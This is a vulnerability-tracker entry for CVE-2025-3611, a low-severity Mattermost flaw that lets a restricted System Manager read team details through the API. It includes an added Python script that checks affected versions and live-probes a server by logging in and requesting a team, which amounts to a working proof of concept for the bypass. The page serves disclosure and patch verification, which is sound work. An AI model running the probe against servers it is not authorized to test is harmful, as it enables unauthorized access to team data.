CVE-2025-3611

LOW

Mattermost 9.11.0-9.11.12, 10.5.0-10.5.3, 10.7.0 - Authenticated Incorrect Authorization via Team API Endpoint


Description

Mattermost versions 10.7.x <= 10.7.0, 10.5.x <= 10.5.3 and 9.11.x <= 9.11.12 fail to properly enforce access control restrictions for the System Manager role. An authenticated user holding System Manager privileges can view team details they should not have access to by sending requests directly to the team API endpoints, even when the role is explicitly configured with 'No access' to Teams in the System Console: the restriction is applied in the console but is not enforced on the underlying API.
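The following script is an added example (not Mattermost's own code or test suite) that does two things a practitioner would want from this advisory: it maps a server version string onto the affected ranges stated above, and it probes a running instance the way the description says the bug manifests, by logging in as a System Manager whose Teams permission is set to 'No access' and reading a team directly via the REST API. The endpoint paths (POST /api/v4/users/login, which returns the session token in the Token response header, and GET /api/v4/teams/{team_id}) are Mattermost's documented v4 API; the server URL, credentials and team id at the bottom are placeholders you must replace. Minor versions the advisory does not mention (for example 10.6.x) are reported as unknown rather than guessed.

```python
"""Affected-version check and live API probe for CVE-2025-3611.

Added example; not Mattermost's code. Version ranges are taken from the
advisory text. BASE_URL, LOGIN_ID, PASSWORD and TEAM_ID are placeholders.
"""
import json
import sys
import urllib.error
import urllib.request

# (major, minor) -> highest patch level that the advisory lists as vulnerable:
# 10.7.x <= 10.7.0, 10.5.x <= 10.5.3, 9.11.x <= 9.11.12
AFFECTED = {(10, 7): 0, (10, 5): 3, (9, 11): 12}


def parse_version(v):
    """'10.5.3' -> (10, 5, 3). A '-rc1' style suffix is ignored."""
    parts = v.split("-", 1)[0].split(".")
    if len(parts) != 3 or not all(p.isdigit() for p in parts):
        raise ValueError("unrecognised Mattermost version: %r" % v)
    return tuple(int(p) for p in parts)


def is_affected(version):
    """True if the version falls inside an advisory range, False if it is a
    later patch of a listed minor, None if the minor line is not covered by
    the advisory text, so nothing can be concluded from this page."""
    major, minor, patch = parse_version(version)
    last_bad = AFFECTED.get((major, minor))
    if last_bad is None:
        return None
    return patch <= last_bad


def login(base_url, login_id, password):
    """POST /api/v4/users/login; the session token comes back in the
    'Token' response header."""
    req = urllib.request.Request(
        base_url.rstrip("/") + "/api/v4/users/login",
        data=json.dumps({"login_id": login_id, "password": password}).encode(),
        headers={"Content-Type": "application/json"},
        method="POST",
    )
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.headers["Token"]


def fetch_team_status(base_url, token, team_id):
    """GET /api/v4/teams/{team_id} with the session; returns the HTTP status."""
    req = urllib.request.Request(
        base_url.rstrip("/") + "/api/v4/teams/" + team_id,
        headers={"Authorization": "Bearer " + token},
    )
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.status
    except urllib.error.HTTPError as e:
        return e.code


def verdict(status):
    """Interpret the team read for a System Manager whose Teams permission is
    'No access'. 200 means the console setting was not enforced on the API."""
    if status == 200:
        return "vulnerable: team details returned despite 'No access'"
    if status == 403:
        return "fixed: access denied as configured"
    if status in (401, 404):
        return "inconclusive: check the session token and team id"
    return "inconclusive: unexpected HTTP %d" % status


if __name__ == "__main__":
    # Placeholders (assumptions for the example), replace before running.
    BASE_URL = "https://mattermost.example.com"
    LOGIN_ID = "sysmanager-no-team-access"   # System Manager, Teams = No access
    PASSWORD = "replace-me"
    TEAM_ID = "replace-with-a-real-team-id"
    token = login(BASE_URL, LOGIN_ID, PASSWORD)
    status = fetch_team_status(BASE_URL, token, TEAM_ID)
    print("HTTP %d -> %s" % (status, verdict(status)))
    sys.exit(0 if status == 403 else 1)
```

Run it against a test account, not a production administrator: the probe only reads one team, but a 200 confirms the System Console restriction is bypassable for every team endpoint the description covers. Pair the API result with is_affected() on the version reported by GET /api/v4/system/ping?get_server_status=true or the System Console's About dialog.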

References (1)


Scores

CVSS v3.1 base score 3.1 (Low)
CVSS v3.1 vector CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N
Attack Vector NETWORK
EPSS 0.0014
EPSS Percentile 33.3%

CISA SSVC

Vulnrichment
Exploitation none
Automatable no
Technical Impact partial

Details

CWE CWE-863 (Incorrect Authorization)
Status published
Products (3)
mattermost/mattermost 10.6.0-rc1 - 10.7.1 (Go)
mattermost/mattermost_server 10.7.0 (3 CPE variants)
mattermost/mattermost_server 9.11.0 - 9.11.13
Note: these ranges come from the tracker's CPE data. The advisory text above lists the affected versions as 9.11.x <= 9.11.12, 10.5.x <= 10.5.3 and 10.7.x <= 10.7.0, so treat the upper bounds of the ranges as the first non-affected releases rather than as affected versions.
Published May 30, 2025
Tracked Since Feb 18, 2026